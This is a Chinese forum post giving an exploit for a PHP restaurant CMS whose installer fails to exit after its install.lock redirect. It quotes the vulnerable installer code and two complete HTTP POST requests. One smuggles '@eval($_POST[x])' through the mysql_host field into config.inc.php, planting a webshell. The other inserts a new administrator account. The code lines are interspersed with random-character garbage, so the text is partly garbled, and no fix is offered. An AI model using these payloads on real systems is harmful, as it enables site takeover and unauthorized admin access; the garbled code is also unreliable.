问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。( O2 A( g! ?! ~8 s/ d
G8 M% j7 l) o8 U$ k<?php
; H, ^( @. l7 H m2 H$ c' m4 V) xif(file_exists("../install.lock"))* a/ S' N$ c! \' z9 j4 \$ F! z
{! k! a& V0 Y' O" z- m
header("Location: ../");//没有退出( i; l. _1 x" d; V2 V) v, b, i
}
# p; U |: t. }8 \ D7 j) m
7 B& F& ^! B6 H//echo 'tst';exit;- I& l* K, Y7 U; e+ @$ ?" d/ w
require_once("init.php");1 \( R' P8 l+ W' E, `
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)& u: S3 X' H2 G1 \$ v+ C
{
* x- p+ A, l- ?( T( e) Z, n& B可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。 v) [+ [* U/ l; i/ }; A+ Z4 _
, [ s6 d9 P# n+ g9 t% P) d1、getshell(很危险); W# ?" N! ?. ^" K7 s
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)4 j, O$ S5 p& s) ~9 f3 m% x! X5 _
{
0 I9 f7 l3 ?* [5 S% ~) j- V7 D$smarty->assign("step",1);
5 ]6 {1 K6 j! p$smarty->display("index.html");
1 j8 G# A) j) K$ p ^9 P) Z}elseif($_REQUEST['step']==2)* N& f" s* A5 A* Y( L8 p
{
5 i: [1 n+ v5 s/ I) l/ c# f1 e $mysql_host=trim($_POST['mysql_host']);" |6 m" z; ]8 L5 w. ~1 a1 D
$mysql_user=trim($_POST['mysql_user']);
, l3 C) J6 m& J6 R7 J $mysql_pwd=trim($_POST['mysql_pwd']);% A4 Q6 J5 Y, W
$mysql_db=trim($_POST['mysql_db']);
4 M- P) ?( Q6 g/ o" ^2 v $tblpre=trim($_POST['tblpre']);
1 `( s' e4 f z; j' \* [ $domain==trim($_POST['domain']);
6 ] U1 x3 Y0 v $str="<?php \r\n";
' l f p1 o. }1 O( s $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";! w' S% n. D+ [, ^; }
$str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
% E! C! v" A! K6 f* Q5 P5 X $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
: f* ` s9 c' ^7 K0 l $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
z* l j- @+ W/ L" R $str.='define("MYSQL_CHARSET","GBK");'."\r\n";5 i/ E8 R: r. {
$str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";$ M# v2 E' [$ ~8 _
$str.='define("DOMAIN","'.$domain.'");'."\r\n";
3 ]( O! P+ z+ J: X% ^ $str.='define("SKINS","default");'."\r\n";: O, N. r4 j0 ?, f% o* F
$str.='?>';
0 m& A9 B @% t! A file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件' t$ L. X! }4 C# X* c. F0 @* V8 z# }
上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马
T* N, R2 ^2 @0 X% D5 u! D2 i# q4 UPOST /canting/install/index.php?m=index&step=2 HTTP/1.1
* o% U( ?: }$ {7 A- }/ p$ n% w8 ]Host: 192.168.80.129& [& N3 B& C n. j# m! S
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0+ ~* T- G; `$ w+ J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8- y4 I9 \+ _# m2 i
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
/ h" H- V- ^' \3 T, n! H. XAccept-Encoding: gzip, deflate
! B3 ]) E4 @( \Referer: http://192.168.80.129/canting/install/index.php?step=1% P7 Y7 ~) s8 c
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
; L2 M6 J; x' Q$ u u0 IContent-Type: application/x-www-form-urlencoded/ w1 _! R* y q; Z$ z
Content-Length: 126
* V5 y7 y% X# ?" q: O3 j7 I
( p! K) i( P$ B5 v( [mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD8 T, p3 B) a. {5 w8 E- r
但是这个方法很危险,将导致网站无法运行。( t: [0 M/ U* p3 m2 P# [5 \
! }. X6 X. ]; G3 S2 }2、直接添加管理员
# Z- u( B6 \6 a8 |# E. X* F$ T5 L- n, ^3 H, z6 z
elseif($_REQUEST['step']==5)
% o: r- Y0 K$ d/ D+ p3 N( ?{% T- k, L. B0 L/ \5 V' a
if($_POST)/ d- x- P1 p5 H0 V; j$ B9 E* x
{ require_once("../config/config.inc.php");
4 ~5 @+ {6 N% H6 u8 \. y $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);! }" s! T8 P0 h7 ]) m( k
mysql_select_db(MYSQL_DB,$link);
7 c! v( R a: ]- o3 h& ]. \ mysql_query("SET NAMES ".MYSQL_CHARSET );
) n, x* ]. X7 Z& Q$ q% ?2 ` mysql_query("SET sql_mode=''");9 U) Z* z" n& \5 ]+ Y. r; z
, x5 Z8 n0 H$ t/ E $adminname=trim($_POST['adminname']);% Q1 m$ m- V; k) u3 Q) L, d6 [5 W9 c
$pwd1=trim($_POST['pwd1']);
: F* @2 i3 w9 w3 O $pwd2=trim($_POST['pwd2']);( J3 Q' Q/ x1 Z0 i* R
if(empty($adminname)) k8 Q" A* ?9 q0 n
{
1 ~3 |1 v2 ^- m! T! \1 i: G) s4 J& J- |+ f3 q2 R
echo "<script>alert('管理员不能为空');history.go(-1);</script>";+ H9 L5 i. h$ Q5 i6 ?$ z" [6 E; [! [
exit();
8 A# S& ~4 y/ S7 ? }
8 Z$ M- ~% S' ? if(($pwd1!=$pwd2) or empty($pwd1))! B* Z& o6 T- C( A( `$ r
{
' `: @: y8 I$ ~7 {) e- H echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出
. y! }9 J- f" A* j6 v }
( J+ Z; L9 F: s& } mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员
5 r7 D4 e) F- c8 E+ n1 Z1 y }
: B0 W1 r8 w% A' y0 q这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:
2 W3 e: t# \6 a4 ]2 R1 [! o# SPOST /canting/install/index.php?m=index&step=5 HTTP/1.1
" E2 w- N# a( Z0 ~" OHost: 192.168.80.129
" y8 O3 r b& T( q6 g, qUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
% S% g& V) p3 S) J. k/ X! F: iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8) e1 S8 X! ]. z: u% c, m& U L
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.36 u# X! [0 F- n4 Q
Accept-Encoding: gzip, deflate9 ?: z j5 r; B7 x
Referer: http://www.2cto.com /canting/install/index.php?step=1
8 |4 O! k5 _ r' v7 y6 }4 BCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
: ?, h7 t L$ s% O! |* W/ |& i. eContent-Type: application/x-www-form-urlencoded
: O1 u9 V/ [- V) WContent-Length: 46
p1 y8 D/ z; {
3 S5 D1 m0 f+ l/ D1 ]2 Gadminname=qingshen&pwd1=qingshen&pwd2=qingshen
1 E+ a( _+ q% X$ p |
发表于 2012-12-4 11:13:44
收藏
支持
反对